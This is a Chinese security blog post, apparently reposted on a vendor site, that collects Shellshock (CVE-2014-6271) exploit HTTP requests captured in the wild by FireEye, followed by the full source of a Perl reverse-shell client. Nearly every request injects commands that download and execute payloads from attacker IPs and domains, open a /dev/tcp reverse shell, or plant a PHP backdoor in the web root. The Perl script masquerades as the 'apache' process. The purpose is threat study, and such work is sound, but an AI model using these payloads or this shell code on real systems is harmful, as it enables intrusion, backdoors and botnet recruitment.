长亭百川云 - 文章详情

破壳漏洞利用payload—shellshock in the wild - r00tgrok

博客园 - r00tgrok

35

2024-07-19

FireEye关于破壳漏洞(shellshock)在现实中的利用有一篇文章: shellshock in the wild

原文较长,进行了对CGI利用的详细分析,笔者比较感兴趣的是Shellshock in the wild, 包括反弹shell、植入后门、信息窃取等行为如何实现。笔者从原文中摘出了对应利用方式的HTTP报文,感兴趣的朋友可以看原文获取较详细的分析,也可以自己试着分析一下。笔者从Bash漏洞曝光以来,对其进行了数日的跟踪,对CVE-2014-6271破壳漏洞的跟踪

Reverse Shell Perl Script:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.1
User-Agent: () { :;}; /bin/ -c “/usr/bin/wget http://singlesaints\[.\]com/firefile/temp?h= -O /tmp/a.pl”
Host:
Accept: */*

Tsunami/Kaiten, an IRC-based DDoS Client/Backdoor:
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/-shellshock-scan-of-internet.html)
Accept: */*
Cookie: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Host: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Referer: () { :; }; wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;

UDP Flood:
‪GET / HTTP/1.0
User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan)
Accept: */*
Cookie: () { :; }; wget 37.187.225.119/conf.txt > /var/www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php
Host: () { :; }; wget 37.187.225.119/conf.txt > /var/www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php Referer: () { :; }; wget 37.187.225.119/conf.txt > /var/ ‪www/conf.php; wget 37.187.225.119/conf.txt > /var/www/html/conf.php

Perl.Shellbot, another IRC-based DDoS Client/Backdoor:
GET / HTTP/1.0
Accept: */*
Accept-Language: en-US
User-Agent: () { :;}; /bin/ -c ‘ -i >& /dev/tcp/195.225.34.101/3333 0>&1′
Host:
Connection: Close

Another Perl.Shellbot Variant:
GET /cgi-bin/hello HTTP/1.0
User-Agent: () { :;}; /bin/ -c “cd /tmp; wget http://dl.directxex\[.\]net/dl/nice.png; chmod +x *; perl nice.png” Host:

Tiny Reverse Shell ELF Executable:
GET /cgi-bin/ICuGI/EST/blast_detail.cgi%3FID%3DPU056535%26db%3DGenBank%26organism%3Dcucurbita_pepo HTTP/1.1
Host:
content-length: 0
accept-encoding: gzip, deflate
referrer: () { :; }; /bin/ -c “rm /tmp/.osock; if $(/bin/uname -m | /bin/grep 64) ; then /usr/bin/wget 82.118.242.223:9199/v64 -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242\[.\]223:9199/v64 /tmp/.osock; /usr/bin/curl http://82.118.242.223:9199/v64 -o /tmp/.osock; else /usr/bin/wget 82.118.242.223:9199/v -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242\[.\]223:9199/v /tmp/.osock; /usr/bin/curl http://82.118.242\[.\]223:91 99/v -o /tmp/.osock; fi; /bin/chmod 777 /tmp/.osock; /tmp/.osock”
accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
cookie: () { :; }; /bin/ -c “rm /tmp/.osock; if $(/bin/uname -m | /bin/grep 64) ; then /usr/bin/wget 82.118.242.223:9199/v64 -O /tmp/.osock; /usr/bin/lwp-download http://82.118.242\[.\]223:919

   对于前文提到的第一个Perl的反弹脚本,其源码地址为:http://ww7.microtek.com.tw/Uploads/test/ttyClient.pl

#!/usr/bin/perl -w

use IO::Socket;
use Fcntl;

# IOCTLs
$TIOCGPTN = -2147199952;
$TIOCSPTLCK = 1074025521;
$EAGAIN\=11;

print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\\n";

$HOST\=$ARGV\[0\];
$PORT\=$ARGV\[1\];
$0\="apache";
print "Connecting to $HOST:$PORT... ";

$sock = new IO::Socket::INET (
    PeerAddr \=> $HOST,
    PeerPort \=> $PORT,
    Proto \=> 'tcp',
    Blocking \=> 0,
) or die $!;

print "ok\\nAllocatig pseudo terminal... ";

#\# ptsname
sysopen (PTMX, '/dev/ptmx', O\_RDWR|O\_NONBLOCK) or die $!;
$tmp\='';
ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
$pts = unpack('i', $tmp);

print "/dev/pts/$pts\\nInitializing pseudo terminal... ";

#\# grantpt not needed on devpts

## unlockpt
$unlock\=pack('i', 0);
ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;

#\# prepare daemonizing
chdir '/' or die $!;
open STDIN, '/dev/null' or die $!;
umask 0;

print "ok\\nForking shell thread...";

defined($pid = fork) or die $!;
exit if $pid;
defined($pid = fork) or die $!;
if (!$pid) {
    exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
    exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
    die $!;
    exit;
}        

print "ok\\nHave fun!\\n";

open STDOUT, '\>>/dev/null' or die $!;
open STDERR, '\>>/dev/null' or die $!;

$pp = PTMX;
$rin\=$win\=$ein\='';
vec($rin,fileno($pp),1) =1;
vec($rin,fileno($sock),1) = 1;

select $sock;
$|=1;
select PTMX;
$|=1;
select STDOUT;
$|=1;
$finished\=0;

sub forwarddata {
    my ($from,$to) = @\_;
    while(1) {
        $rv = sysread($from, $buff, 1024);
        last if (!defined($rv) && $! == $EAGAIN);    
        defined($rv) or die $!;
        if ($rv == 0) { $finished = 1; last;}
        while(length $buff > 0) {
            $rv = syswrite($to, $buff, length $buff);
            if (!defined($rv) && $! == $EAGAIN) {
                #\# try again
                next;
            }
            defined($rv) or die $!;
            last if ($rv == length $buff);
            substr($buff,0,$rv) = '';
        }
    }
}

while(! $finished) {
    $nfound = select($rout\=$rin, $wout\=$win, $eout\=$ein, undef);
    die $! if ($nfound == -1);
    forwarddata($pp,$sock);
    last if $finished;
    forwarddata($sock,$pp);
    last if $finished;
}
close PTMX;
close $sock;
$wout\=$eout.$wout.$rout;
相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2